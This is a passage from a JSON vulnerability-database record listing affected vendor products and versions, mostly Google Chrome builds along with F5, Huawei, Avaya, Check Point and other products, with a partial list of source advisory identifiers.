"ibm", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.89" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.332.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.49" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.107" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.953.0" }, { "model": "oceanstor s2600t v100r005c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.666.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1071.0" }, { "model": "big-ip edge gateway", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1013.0" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5.1" }, { "model": "collaboration pod on vmware vcenter server appliance", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "2.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.41" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.0.23988" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.73" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.83" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.0.275.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.340.0" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.5" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57450" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.373.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.46" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.87" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.32" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.2" }, { "model": "thinpro", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1036.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.50" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v50006.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.353.0" }, { "model": "aura presence services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.408.2" }, { "model": "gaia r75.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "7228" }, { "model": "oceanstor s6900 v100r001c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.43" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.26" }, { "model": "policy assessment and compliance", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.47" }, { "model": "secureplatform r75.30", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.51" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.470.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.461.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1285.1" }, { "model": "prime infrastructure", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.446.0" }, { "model": "secureplatform r75.47", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "move firewall", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "3.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.88" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "mac os", "scope": "eq", "trust": 0.3, "vendor": "apple", "version": "x10.10" }, { "model": "systems insight manager", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "7.3.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.5" }, { "model": "nsmxpress appliances", "scope": "eq", "trust": 0.3, "vendor": "juniper", "version": "2012.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.357.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.459.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.541.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.221" }, { "model": "espace u2980 v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.65" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.64" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.31" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.18" }, { "model": "nexus switch for nexus series 4.1 e1", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "1000v4000" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.333.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.779.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.90" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.57" }, { "model": "aura application enablement services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "1.0.154.42" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "6655" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.9" }, { "model": "bsc6000 v900r008c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.307" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.121" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.127" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.20" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1027" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.396.0" }, { "model": "network security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "7.1.157" }, { "model": "bsc6000 v901r013c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.110" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.101" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.428.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.42" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.29" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.612.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.95" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1035.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.767.0" }, { "model": "colorqube", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "9301" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.891.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.460.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.14" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1001.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.87" }, { "model": "siem enterprise security manager", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "9.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.2" }, { "model": "vcloud networking and security", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "5.5" }, { "model": "galax8800 v100r002c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "secureplatform r71.50", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.466.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1053" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.74" }, { "model": "viewplanner", "scope": "eq", "trust": 0.3, "vendor": "vmware", "version": "3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.8" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "5945" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.455.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.45" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.25" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1014.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.220" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.210" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.21" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.449.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.142" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.26" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.9" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.911.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.4" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.620.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.10" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.497.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "33.0.1750.82" }, { "model": "oceanstor s5900 v100r002c00", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.576.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "28.0.1500.61" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1015.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.33" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.795.0" }, { "model": "big-ip apm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.1.0" }, { "model": "secureplatform r76", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "2.6" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.213" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1010.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.13" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "16.0.912.12" }, { "model": "gaia embedded r70.40", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "big-ip wom", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.148" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.99" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1682.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.437.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.751.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.636.0" }, { "model": "secure access link gas", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.0" }, { "model": "oceanstor s5300 v100r005c02", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.91" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.313" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.360.5" }, { "model": "ip office server edition", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "8.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "65.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.12" }, { "model": "workcentre", "scope": "eq", "trust": 0.3, "vendor": "xerox", "version": "57400" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.64" }, { "model": "big-iq cloud", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1670.5" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.456.0" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.874.12" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.831.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "37.0.2062.65" }, { "model": "saas email protection", "scope": "eq", "trust": 0.3, "vendor": "mcafee", "version": "1.0" }, { "model": "oceanstor s6800t v100r001c01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "high-density server dh621 v100r001c00", "scope": "eq", "trust": 0.3, "vendor": "huawei", "version": "v2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.18" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.38" }, { "model": "big-iq security", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "4.2" }, { "model": "secureplatform r76", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "proactive contact", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "5.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.111" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.67" }, { "model": "big-ip link controller", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.375.53" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.550.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1305.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.583.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.317.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.595.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1009" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "34.0.1847.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.108" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "0.3.154.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "23.0.1271.17" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.94" }, { "model": "virtual security gateway for microsoft hyper-v", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "15.0.866.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.34" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.48" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.35" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1673.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "25.0.1364.72" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.22" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "30.0.1599.101" }, { "model": "big-ip gtm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.2.1" }, { "model": "workcentre spar", "scope": "ne", "trust": 0.3, "vendor": "xerox", "version": "7545061.121.225.06100" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.85" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.47" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.131" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.15" }, { "model": "secureplatform r71.10", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.128" }, { "model": "configuration and orchestration manager vps", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.342.8" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.62" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-320" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1700.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.653.0" }, { "model": "aura application server sip core pb16", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "53002.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.63" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "32.0.1656.1" }, { "model": "associates layer api management portal", "scope": "eq", "trust": 0.3, "vendor": "computer", "version": "70" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "22.0.1229.92" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "17.0.963.35" }, { "model": "big-ip ltm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "10.2.4" }, { "model": "big-ip asm", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.0.00" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.713.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.643.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.62" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.22" }, { "model": "fusioncompute v100r003c10", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1057.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.7" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "8.0.552.228" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.2" }, { "model": "flex system manager", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "1.2.1" }, { "model": "unified communications manager", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.28" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.504.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.517.44" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1312.12" }, { "model": "ipso r71.40", "scope": "eq", "trust": 0.3, "vendor": "checkpoint", "version": "6.2" }, { "model": "unstructured data identification and mgmt", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "7.5.1" }, { "model": "communication server 1000m", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.767.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "24.0.1292.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1058.0" }, { "model": "big-ip analytics", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.4.1" }, { "model": "telepresence system", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "500-370" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "18.0.1025.129" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "12.0.742.21" }, { "model": "aura communication manager utility services", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "6.2" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "31.0.1650.52" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "20.0.1132.54" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.41" }, { "model": "next generation firewall", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.14150" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.218" }, { "model": "oneview", "scope": "eq", "trust": 0.3, "vendor": "hp", "version": "1.05" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.418.4" }, { "model": "gaia r71.50", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "visual quality experience tools server", "scope": "eq", "trust": 0.3, "vendor": "cisco", "version": "0" }, { "model": "storwize", "scope": "eq", "trust": 0.3, "vendor": "ibm", "version": "v37007.1" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.68" }, { "model": "espace dcm v100r001", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.359.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1084.26" }, { "model": "communication server 1000m signaling server", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.205" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.597.83" }, { "model": "big-ip webaccelerator", "scope": "eq", "trust": 0.3, "vendor": "f5", "version": "11.3" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.78" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.565.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "7.0.536.3" }, { "model": "communication server 1000e", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "7.5" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "9.0.567.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "5.0.37586" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.835.33" }, { "model": "oceanstor cse v100r002c00lsfm01", "scope": null, "trust": 0.3, "vendor": "huawei", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "6.0.472.56" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "27.0.1453.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "13.0.782.238" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.656.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.696.55" }, { "model": "ip flow manager", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "21.0.1180.53" }, { "model": "b189 ip conference phone", "scope": "eq", "trust": 0.3, "vendor": "avaya", "version": "1.022" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "4.1.249.1011" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "10.0.648.66" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "19.0.1033.0" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "35.0.1916.38" }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "14.0.788.0" }, { "model": "gaia embedded r70.30", "scope": null, "trust": 0.3, "vendor": "checkpoint", "version": null }, { "model": "chrome", "scope": "eq", "trust": 0.3, "vendor": "google", "version": "11.0.691.0" } ], "sources": [ { "db": "CERT/CC", "id": "VU#252743" }, { "db": "BID", "id": "70154" }, { "db": "JVNDB", "id": "JVNDB-2014-004433" }, { "db": "JVNDB", "id": "JVNDB-2014-000126" }, { "db": "CNNVD", "id": 